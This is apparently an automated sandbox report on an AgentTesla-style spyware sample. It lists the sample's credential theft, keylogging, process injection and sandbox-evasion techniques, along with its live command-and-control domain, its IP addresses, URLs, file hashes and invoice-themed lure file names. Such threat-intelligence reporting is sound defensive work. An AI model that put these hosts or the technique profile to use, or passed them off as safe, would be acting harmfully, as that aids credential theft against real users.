                      Source: Yara matchFile source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection312Disable or Modify Tools1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Input Capture1Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Credentials in Registry1Security Software Discovery121SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSProcess Discovery2Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      W7UbgU8x18.exe36%VirustotalBrowse
                      W7UbgU8x18.exe29%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      W7UbgU8x18.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      2.2.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      2.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      odin.mk-host.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://194.85.248.2190%Avira URL Cloudsafe
                      http://odin.mk-host.com1%VirustotalBrowse
                      http://odin.mk-host.com0%Avira URL Cloudsafe
                      http://194.85.248.219/token_ta992i.txt0%VirustotalBrowse
                      http://194.85.248.219/token_ta992i.txt0%Avira URL Cloudsafe
                      http://crl.comodoca0%Avira URL Cloudsafe
                      http://sGexjS.com0%Avira URL Cloudsafe
                      http://194.85.248.219/publickey.txt0%Avira URL Cloudsafe
                      http://m3kI8gc4jNB3oWFQtMC.org0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      odin.mk-host.com
                      		209.205.200.74
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://194.85.248.219/token_ta992i.txtfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://194.85.248.219/publickey.txtfalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                          		high
                          http://127.0.0.1:HTTP/1.1aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://DynDns.comDynDNSaspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://sectigo.com/CPS0aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haaspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://194.85.248.219W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                		high
                                http://upx.sf.netAmcache.hve.10.drfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                    		high
                                    http://odin.mk-host.comaspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                              		high
                                              http://crl.comodocaaspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://sGexjS.comaspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameW7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://m3kI8gc4jNB3oWFQtMC.orgaspnet_regbrowsers.exe, 00000002.00000002.519418805.000000000354A000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000003.465831512.00000000011A4000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.519494646.0000000003588000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipW7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    209.205.200.74
                                                    		odin.mk-host.comUnited States
                                                    		5508124SHELLSUStrue
                                                    194.85.248.219
                                                    		unknownRussian Federation
                                                    		35478DATACENTERROfalse

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:528611
                                                    Start date:25.11.2021
                                                    Start time:14:59:18
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 36s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:W7UbgU8x18 (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:29
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/7@1/2
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0.2% (good quality ratio 0.1%)
                                                    • Quality average: 41%
                                                    • Quality standard deviation: 41%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 43
                                                    • Number of non-executed functions: 5
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:00:39API Interceptor726x Sleep call for process: aspnet_regbrowsers.exe modified
                                                    15:00:43API Interceptor1x Sleep call for process: WerFault.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    209.205.200.74Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                      YaMfg60AB4.exeGet hashmaliciousBrowse
                                                        EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                                          cwSfuiHmL1.exeGet hashmaliciousBrowse
                                                            HqCYq1FI94.rtfGet hashmaliciousBrowse
                                                              2G37r9n60v.exeGet hashmaliciousBrowse
                                                                PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                  ujbZuYEbJR.exeGet hashmaliciousBrowse
                                                                    INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                                                      ZngI6XZfV9.exeGet hashmaliciousBrowse
                                                                        0DjNfigrSU.exeGet hashmaliciousBrowse
                                                                          CERAMIC VASE%0D%0A (3X40HQ).xlsxGet hashmaliciousBrowse
                                                                            I7P5KZHgki.exeGet hashmaliciousBrowse
                                                                              Order Confirmation AB22-00569.xlsxGet hashmaliciousBrowse
                                                                                PO_SC83994.docxGet hashmaliciousBrowse
                                                                                  veuN0vTYpY.exeGet hashmaliciousBrowse
                                                                                    6eqc2eIrv4.exeGet hashmaliciousBrowse
                                                                                      JJsI4Pb10I.exeGet hashmaliciousBrowse
                                                                                        PO-367M.xlsxGet hashmaliciousBrowse
                                                                                          1tDAoT9EWD.exeGet hashmaliciousBrowse
                                                                                            194.85.248.219Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 194.85.248.219/publickey.txt

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            odin.mk-host.comSales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            YaMfg60AB4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            cwSfuiHmL1.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            HqCYq1FI94.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            2G37r9n60v.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            ujbZuYEbJR.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            ZngI6XZfV9.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            0DjNfigrSU.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            CERAMIC VASE%0D%0A (3X40HQ).xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            I7P5KZHgki.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            Order Confirmation AB22-00569.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PO#SC83994.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PO_SC83994.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            veuN0vTYpY.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            EB54JNfpvd.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            6eqc2eIrv4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            JJsI4Pb10I.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74

                                                                                            ASN

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            24SHELLSUSSales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            YaMfg60AB4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            EDyyOwFu2Y.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            cwSfuiHmL1.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            HqCYq1FI94.rtfGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            2G37r9n60v.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            Linux_amd64Get hashmaliciousBrowse
                                                                                            • 209.205.221.250
                                                                                            ujbZuYEbJR.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            INVOICE - FIRST 2 CONTAINERS 111.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            ZngI6XZfV9.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            AWB1145235666.PDF.vbsGet hashmaliciousBrowse
                                                                                            • 209.205.207.130
                                                                                            0DjNfigrSU.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            CERAMIC VASE%0D%0A (3X40HQ).xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            I7P5KZHgki.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            Order Confirmation AB22-00569.xlsxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            RFQ #CNXT-HG20211109.exeGet hashmaliciousBrowse
                                                                                            • 192.119.9.178
                                                                                            PO_SC83994.docxGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            veuN0vTYpY.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            6eqc2eIrv4.exeGet hashmaliciousBrowse
                                                                                            • 209.205.200.74
                                                                                            DATACENTERROSK TAX INV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            xA7ry4Ewuk.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.167
                                                                                            Sales Pro forma invoice_SO0005303101427.docxGet hashmaliciousBrowse
                                                                                            • 194.85.248.219
                                                                                            Statement from QNB.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.156
                                                                                            CV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            INV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            CV.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.250
                                                                                            TMR590241368.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.115
                                                                                            vIyyHkRXJnGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            267A80yAhpGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            QJYxAALd23Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            z4bJfjXDDQGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            XXaLHoecGpGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            AGiCic4uDzGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            3B3BMxYG8nGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            6WMo1OYmk3Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            dycuTng5W8Get hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            xINX4f5M8sGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            SSIuSyaBAFGet hashmaliciousBrowse
                                                                                            • 194.85.250.154
                                                                                            IMG600094173852.exeGet hashmaliciousBrowse
                                                                                            • 194.85.248.115

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_W7UbgU8x18.exe_31f1e8177b64c27c98341b539e8a5b3c0473765_6dc08ccc_19fa331d\Report.wer
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.096973568105997
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:2lnAlyoZooaHBUZMXSaKsUAe5Z/u7s0S274It9:onAUiolBUZMXSaluZ/u7s0X4It9
                                                                                            MD5:02EF02D2B701A2F22EF28F8A91B293DD
                                                                                            SHA1:0AC42F26155E7234072A6050D6689DF870D4C778
                                                                                            SHA-256:8C11AC9C42AC81E3851DFC5F567C85B713A6BC46755D001BFD43E0B0E127FE4C
                                                                                            SHA-512:BF9A6AF55EA1993BC0809A461447C7270F8D23808CF5E1CFFDC7022ABF0B6C52AD6C4CCC817C9E4BA205800DB123F15A9FFC7B58BCC8793B41DB87DDA77F280A
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.3.5.4.8.3.1.1.8.9.5.0.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.3.5.4.8.4.2.0.9.5.7.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.9.1.e.9.5.3.-.e.7.a.1.-.4.a.7.3.-.9.3.b.b.-.d.3.c.7.6.2.6.6.0.4.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.4.a.6.3.9.e.-.3.e.8.3.-.4.4.d.f.-.a.b.8.7.-.a.1.6.2.9.d.1.9.0.c.a.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.7.U.b.g.U.8.x.1.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.u.n.e.r.a.i.d.f.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.c.-.0.0.0.1.-.0.0.1.6.-.0.9.c.2.-.6.3.3.6.5.0.e.2.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.5.c.7.b.2.7.4.d.0.f.e.5.3.2.e.f.b.8.e.5.2.c.f.9.5.6.3.4.0.0.b.0.0.0.0.0.0.0.0.!.0.0.0.0.c.4.2.7.8.c.f.2.5.d.a.5.2.a.d.c.0.5.f.4.d.2.1.6.1.a.1.1.c.7.b.9.6.
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B51.tmp.WERInternalMetadata.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8396
                                                                                            Entropy (8bit):3.696838818148438
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Rrl7r3GLNiGq6E6YIqSUeEQgmfZeVSNCprC89bZesfDmIzm:RrlsNiz6E6YFSUeEQgmfiSeZdfSx
                                                                                            MD5:4CE5FAD37F9ED557C1C5490697F78059
                                                                                            SHA1:0E0871C79981EF7D2487AFA0963C88E9139CB643
                                                                                            SHA-256:3E3AB02E3555C551DD8EE205CF9C3F20D04C2828C78F30C5CC33A74D1A4EE650
                                                                                            SHA-512:5A0C146FE0650ACCAF568A62517F8FA4DA12ABC57C8A88E18CB9FA36BA0E7F10B3279860999972D20A4D0FD3FDA7EE11C83B830789E30F255C892E039728579C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.4.<./.P.i.d.>.......
                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F68.tmp.xml
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4740
                                                                                            Entropy (8bit):4.465185228666966
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwSD8zsVJgtWI986WSC8BAo8fm8M4J5Ly2FQ+q8vTLyUm7n1jd:uITfvH7SNMJAKVmz1jd
                                                                                            MD5:453D8F13ADC28961F1969B8D331506E0
                                                                                            SHA1:2A5C9392FE9F6A8AFAFE3F56039526D9C87A6C43
                                                                                            SHA-256:74DE17553E832B589ACE03BEBF313EBB6A10F40DA1BD789F309E6BC2E842D5C6
                                                                                            SHA-512:1C06C173C348A3F2B479D1E33B40546AD3659273DCEF57FC0ACA1F89C92DDBE36A50D2CCF33BEA295218C1F10A0C74E43B500B2423501E1FB06C660BF2FE918E
                                                                                            Malicious:false
                                                                                            Reputation:low
